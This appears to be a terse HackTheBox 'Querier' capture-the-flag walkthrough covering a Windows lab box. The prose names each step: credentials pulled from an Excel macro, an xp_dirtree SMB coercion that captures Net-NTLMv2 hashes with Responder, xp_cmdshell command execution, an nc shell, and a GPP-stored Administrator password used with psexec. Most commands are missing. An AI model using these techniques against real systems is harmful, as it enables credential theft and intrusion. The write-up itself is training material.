HTB | Querier
This is a Windows box. You can find it here.
Skill Learned
Excel macros
PowerView
NMAP
IP: 10.10.10.125
Port 139 and 445
smbclient
Able to connect to Reports
get the file
Foothold/shell
It is Microsoft Excel 2007
found vbaProject.bin in xl folder
found the username and password we can use this cred to login to mssql (port 1433)
To check for permission we have
I can check out the databases available:
Capture Net-NTLMv2
The xp_dirtree command to get it to connect to me over SMB where we will be listening with the responder to capture the Net-NTLMv2.
I’ll use xp_dirtree to load a file, and I’ll tell the DB that the file is in an SMB share on my hosts. The server will try to authenticate to my host, where the responder will collect the Net-NTLMv2.
Next, I’ll issue the connect to load a file using xp_dirtree from an SMB share (that doesn’t exist) on my host:
.
on responder we have hashes
Since it is ntlmv2, we will use -m 5600
Let's connect with mssql-svc
We can do cmd execution by using xp_cmdshell
Note, the actual syntax to run a command is EXEC xp_cmdshell '[command]';. However, the client I’m using to connect, mssqlclient.py has a built-in command to run a command over xp_cmdshell, so I can just type xp_cmdshell [command].
As mssql-svc, I can enable xp_cmdshell (something I couldn’t do as reporting). Just like running a command, there is an alias to do this in the script. The full commands are (from Microsoft’s documentation (https://learn.microsoft.com/en-us/sql/database-engine/configure-windows/xp-cmdshell-server-configuration-option?view=sql-server-2017) ):
WindowsTo get a full shell on the box, there are many ways to go. I’ll host nc on an smb server, and let Windows run it from there.
found user.txt
Priv Esc
Let's copy PoweUp.ps1
In the GPP file, we found the Administrator password
Since we have a password we can use psexec
we are in as nt authority\system
Last updated